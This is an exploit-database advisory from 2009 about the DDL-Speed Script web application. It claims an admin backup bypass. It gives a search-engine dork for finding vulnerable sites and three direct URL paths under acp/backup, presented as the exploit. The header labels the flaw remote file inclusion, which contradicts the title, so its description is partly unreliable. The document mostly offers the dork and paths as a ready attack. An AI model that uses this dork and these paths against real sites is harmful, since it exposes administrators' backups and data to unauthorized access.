id: 4580
date: 01/01/2009
title: DDL-Speed Script (acp/backup) Admin Backup Bypass Vulnerability
author: tmh
cves: 

===============================================================
DDL-Speed Script (acp/backup) Admin Backup Bypass Vulnerability
===============================================================


########################################################################################################################
#DDL-Speed Script RFI Vulnerabilities											
#=======================================================================================================================
#                                                                     							
#Critical Level : Dangerous                                           							
#                                                                     							
#Vendor site : http://ddl-speed.org/  ( Will be back soon)  								
#															
#Download : http://scriptmafia.org/cms/1766-ddl-speed.org-script-vom-30.03.2008.html					
#															
#=======================================================================================================================
#															
#DORK : "index.php?section=post_upload"                                       						
#                                                       								
#															
#															
#Exploit :														
#--------------------------------											
#															
#www.[URL]/[PATH]/acp/backup/log.php	
#www.[URL]/[PATH]/acp/backup/index.php
#www.[URL]/[PATH]/acp/backup/acp.php										
#															
#=======================================================================================================================
########################################################################################################################


#  0day.today [2023-03-24]  #